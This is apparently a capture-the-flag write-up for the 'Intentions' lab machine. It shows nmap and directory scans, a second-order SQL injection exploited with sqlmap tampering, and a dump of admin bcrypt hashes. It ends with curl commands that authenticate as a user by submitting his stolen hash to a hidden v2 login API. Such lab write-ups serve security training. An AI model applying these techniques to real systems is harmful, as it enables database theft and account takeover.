$ nmap -sC -sV -Pn -oN nmap 10.10.11.220
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-20 21:35 +08
Nmap scan report for 10.10.11.220
Host is up (0.043s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 47:d2:00:66:27:5e:e6:9c:80:89:03:b5:8f:9e:60:e5 (ECDSA)
|_ 256 c8:d0:ac:8d:29:9b:87:40:5f:1b:b0:a4:1d:53:8f:f1 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Intentions
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.80 seconds
Initial Access
2nd Order SQLi vulnerability
We will first save the request to get feed for the user to getfeed.
Then, we will save the request to update the content of the user's feed.
Then we will run it using sqlmap.
However, we will encounter an error after running that command.
If we look at the values each time we update, we will notice that all the whitespaces will be removed. For example, food, travel will become food,travel. So we can counter this by converting spaces to comments using --tamper=space2comment.
It is able to detect that the backend database is MySQL.
Next, we will dump all the data in the database.
We will see that there are 4 different tables in the database.
The first table is migrations.
The second table is users.
The third table is gallery_images.
The last table is personal_access_token.
We only cared about the 2 admin users in the userstable.
However, it does not seems the password is crackable. So we will see if there is another way to use this hash.
Hidden API path
Further enumeration in the machine, we will see that there is an admin.js file.
After searching for the keyword password, we came across this.
So we try to see if there is any api path at v2 instead and there are.
We can see that POST request failed as they required both the email and hash parameters.
After following the website on how to do a POST request using Curl, we are able to authenticated as steve.
[21:56:23] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
$ feroxbuster -u http://10.10.11.220 -x js,html,php,txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.11.220
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [js, html, php, txt]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 36l 123w 6609c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 7l 10w 162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 1l 3w 16c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 7l 12w 178c http://10.10.11.220/css => http://10.10.11.220/css/
301 GET 7l 12w 178c http://10.10.11.220/js => http://10.10.11.220/js/
302 GET 12l 22w 322c http://10.10.11.220/logout => http://10.10.11.220
302 GET 12l 22w 322c http://10.10.11.220/admin => http://10.10.11.220
200 GET 2l 5429w 279176c http://10.10.11.220/js/login.js
200 GET 2l 2249w 153684c http://10.10.11.220/js/mdb.js
200 GET 63l 3842w 411821c http://10.10.11.220/css/app.css
200 GET 39l 94w 1523c http://10.10.11.220/
200 GET 2l 6382w 311246c http://10.10.11.220/js/admin.js
\n Hey team, I've deployed the v2 API to production and have started using it in the admin section. \n Let me know if you spot any bugs. \n This will be a major security upgrade for our users, passwords no longer need to be transmitted to the server in clear text! \n By hashing the password client side there is no risk to our users as BCrypt is basically uncrackable.\n This should take care of the concerns raised by our users regarding our lack of HTTPS connection.\n
$ curl -X POST http://10.10.11.220/api/v2/auth/login
{"status":"error","errors":{"email":["The email field is required."],"hash":["The hash field is required."]}}
$ curl -X POST -d 'email=steve@intentions.htb&hash=$2y$10$M/g27T1kJcOpYOfPqQlI3.YfdLIwr3EWbzWOLfpoTtjpeMqpp4twa' http://10.10.11.220/api/v2/auth/login
{"status":"success","name":"steve"}
